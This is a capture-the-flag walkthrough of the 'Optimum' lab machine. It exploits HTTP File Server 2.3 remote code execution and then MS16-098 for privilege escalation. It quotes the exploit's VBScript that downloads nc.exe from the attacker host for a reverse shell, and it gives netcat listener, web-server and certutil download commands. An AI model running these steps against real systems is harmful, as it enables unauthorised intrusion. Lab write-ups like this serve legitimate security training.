This is a relative easy machine, as seen from the matrix the attacks are more related to CVE.
nmap -A -p- -T4 -oN optimum -vvv 10.10.10.8
Http File Server 2.3
As shown in the web browser, the web service is hosted by http file server which is a program for windows to server files via http web service, this is easy to use and setup without too much effort on the user’s end.
httpfileserver 2.3 exploit
A search from the web reveals that httpfileserver 2.3 has a remote code execution exploit written in python.
Reading the exploit code, it is obvious that the python is creating a vb script with the following source code:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite end with
The exploit code downloads nc.exe from the attacker’s machine then save it as nc.exe in C:\Users\Public. Then execute the script to trigger nc.exe to do a reverse tcp and create a cmd shell, the vulnerability of HFS 2.3 lies on its variable –
Get the user flag
I need to turn on a web server that hosts the nc.exe then on another terminal I need to create a nc server to listen on.
On the exploit code I change the ip address to my own tunnel ip address so that the exploit will do a connection back to my nc server.
python3 -m http.server 80
This command has to be executed in the directory that has the nc.exe.
then start my nc server
sudo nc -lvnp 443
Modify the ip address within the exploit code, then run it.
python 39161.py 10.10.10.8 80
The user flag is
Get the root
I recommend take a look at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
systeminfo the machine is running Windows 2012 R2 standard edition build 9600, there are a few kernel exploits which are usable, I chose the kernel driver exploit MS16-098, this exploit though is related to Windows 8.1 works perfectly on Windows 2012 server as well.
I download the compiled binary
bfill.exe then serve a web server for me to download from Optimum.
On the Optimum machine I do
certutil -f -urlcache http://10.10.14.27/bfill.exe c:\users\kostas\downloads\bfill.exe
The run the exploit to get root.
the root flag is